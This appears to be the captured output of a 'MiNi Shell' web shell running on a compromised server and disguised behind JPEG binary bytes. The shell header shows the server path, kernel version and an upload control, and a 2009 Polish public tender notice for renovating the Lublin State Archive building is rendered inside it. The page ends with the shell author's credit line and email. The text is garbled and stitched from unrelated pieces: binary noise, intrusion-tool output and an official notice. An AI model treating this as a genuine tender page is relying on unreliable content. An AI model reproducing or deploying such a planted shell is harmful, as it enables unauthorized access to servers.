JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090519/77453-N-2009.html

<p class="kh_header"><b>Lublin: Remont i modernizacja budynku Archiwum Państwowego w Lublinie przy ul. Jezuickiej 13</b><br>
<b>Numer ogłoszenia: 77453 - 2009; data zamieszczenia: 19.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Archiwum Państwowe w Lublinie , ul. Jezuicka 13, 20-950 Lublin, woj. lubelskie, tel. 081 5328071, faks 0-81 5286146.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lublin.ap.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: archiwum państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i modernizacja budynku Archiwum Państwowego w Lublinie przy ul. Jezuickiej 13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont i modernizacja budynku Archiwum Państwowego w Lublinie przy ul. Jezuickiej 13.

Zakres zamówienia obejmuje:

Część I - Dostosowanie klatki schodowej w skrzydle zachodnim budynku 
do potrzeb ewakuacji i oddymiania, w tym:
1. Dostosowanie klatki schodowej K1 w części północnej zabudowy dla potrzeb ewakuacji i oddymiania.
2. Wykonanie instalacji systemu oddymiania grawitacyjnego.
3. Wykonanie wewnętrznej instalacji wodociągowej przeciwpożarowej dla zasilenia projektowanych wewnętrznych hydrantów p. poż.

Część II - Adaptacja piwnic - II etap, w tym:
1. Prace budowlane wykończeniowe w piwnicach i na parterze w części północnej zabudowy.
2. Modernizacja instalacji elektrycznej i logicznej w części pomieszczeń parteru i piwnicy - II etap.
3. Wykonanie instalacji centralnego ogrzewania w piwnicach i wymiana grzejników na parterze.
4. Wykonanie instalacji wodno-kanalizacyjnej i c.w.u w pomieszczeniach na parterze.
5. Wykonanie szafek pracowniczych oraz zabudowy kuchennej.

Część III - Wymiana dźwigu towarowo-osobowego, w tym:
1. Demontaż starego dźwigu, 
2. Montaż nowego dźwigu, 
3. Wykończenie szybu (montaż oświetlenia, malowanie ścian szybu, doprowadzenie zasilania z rozdzielni na budynku), 
4. Wykonanie dokumentacji technicznej (dozorowej i odbiorowej),
5. Próby pomontażowe, 
6. Regulacje, 
7. Pomiary,
8. Rozruch,
9. Ocena zgodności przeprowadzana przez jednostkę notyfikowaną,
10. Odbiór dźwigu przez UDT.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-6, 45.21.00.00-2, 45.41.00.00-4, 45.42.11.60-3, 45.31.11.00-1, 45.31.21.00-8, 45.33.00.00-9, 45.33.22.00-5, 45.32.00.00-6, 45.32.00.00-6, 45.45.31.00-8, 45.31.57.00-5, 45.31.11.00-1, 45.31.43.10-7, 45.33.11.00-7, 39.10.00.00-3, 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie ma wymogu wpłacenia wadium przez wykonawców<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy: 
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

2. Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:

2.1. Dla wykonawców składających ofertę na Część I zamówienia:
2.1.1. Wykonanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 robót o wartości brutto minimum 100 000 zł każda polegających na budowie, przebudowie lub remoncie budynków.
2.1.2. Dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, przynależącą do Okręgowej Izby Inżynierów Budownictwa.
2.1.3. Dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, przynależącą do Okręgowej Izby Inżynierów Budownictwa.
2.1.4. Dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych, przynależącą do Okręgowej Izby Inżynierów Budownictwa,

2.2. Dla wykonawców składających ofertę na Część II zamówienia:
2.2.1. Wykonanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 robót budowlanych o wartości brutto minimum 100 000 zł każda polegających na budowie, przebudowie lub remoncie budynków.
2.2.2. Dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, przynależącą do Okręgowej Izby Inżynierów Budownictwa.
2.2.3. Dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, przynależącą do Okręgowej Izby Inżynierów Budownictwa.
2.2.4. Dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, przynależącą do Okręgowej Izby Inżynierów Budownictwa.

2.3. Dla wykonawców składających ofertę na Część III zamówienia:
2.3.1. Wykonanie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 robót budowlanych obejmujących montaż dźwigu w budynku kubaturowym o wartości brutto minimum 50 000 zł każda.
2.3.2. Dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, przynależącą do Okręgowej Izby Inżynierów Budownictwa. 

3. Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. 
3.1. Oferty wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające spełnianie wymaganych warunków zostaną dopuszczone do badania i oceny,
3.2. Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających spełnianie wymaganych warunków zostaną wykluczeni z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenia:
1.1. Oświadczenie o spełnieniu warunków udziału w postępowaniu określonych 
w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych a mianowicie oświadczenie, że wykonawca:
1.1.1. posiada uprawnienia do wykonywania działalności w zakresie objętym przedmiotem zamówienia, 
1.1.2. posiada niezbędną wiedzę i doświadczenie oraz: 
a) dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
lub
b) dysponuje potencjałem technicznym oraz przedkłada w załączeniu pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, 
lub
c) dysponuje osobami zdolnymi do wykonania zamówienia oraz przedkłada w załączeniu pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego, 
lub
d) przedkłada w załączeniu pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
1.1.3. znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.1.4. nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych.

2. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, należy złożyć następujące dokumenty:
2.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3. W celu potwierdzenia opisanych przez zamawiającego warunków posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, należy złożyć następujące dokumenty:

3.1. Dla wykonawców składających ofertę na Część I zamówienia:
3.1.1. Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych o wartości brutto minimum 100 000 zł każda polegających na budowie, przebudowie lub remoncie budynków, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
3.1.2. Odpowiednie uprawnienia budowlane w specjalności konstrukcyjno-budowlanej wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa. 
3.1.3. Odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa. 
3.1.4. Odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa. 

3.2. Dla wykonawców składających ofertę na Część II zamówienia:
3.2.1. Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych o wartości brutto minimum 100 000 zł każda polegających na budowie, przebudowie lub remoncie budynków, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
3.2.2. Odpowiednie uprawnienia budowlane w specjalności konstrukcyjno-budowlanej wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa. 
3.2.3. Odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa. 
3.2.4. Odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa. 

3.3. Dla wykonawców składających ofertę na Część III zamówienia:
3.3.1. Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych obejmujących montaż dźwigu w budynku kubaturowym o wartości brutto minimum 50 000 zł każda, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
3.3.2. Odpowiednie uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych wraz z ważnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa.

4. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
4.1. Dokumenty wymagane w pkt 6.2. winien złożyć każdy wykonawca.
4.2. Oświadczenie/oświadczenie i zobowiązanie wymienione w pkt 6.1.1. oraz dokumenty wymagane w pkt 6.3. winny być złożone wspólnie przez wykonawców.

5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Pkt 6.2.1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6.5, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy dotyczące terminów wystawienia stosuje się odpowiednio.

7. Wszystkie powyższe dokumenty winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci >za zgodność z oryginałem<. W przypadku składania elektronicznych kopii dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.

8. Dokumenty sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski, poświadczonym, przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.ap.gov.pl/lublin.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Archiwum Państwowe w Lublinie
ul. Jezuicka 13
20-950 Lublin
Kancelaria.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2009 godzina 14:30, miejsce: Archiwum Państwowe w Lublinie
ul. Jezuicka 13
20-950 Lublin
Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com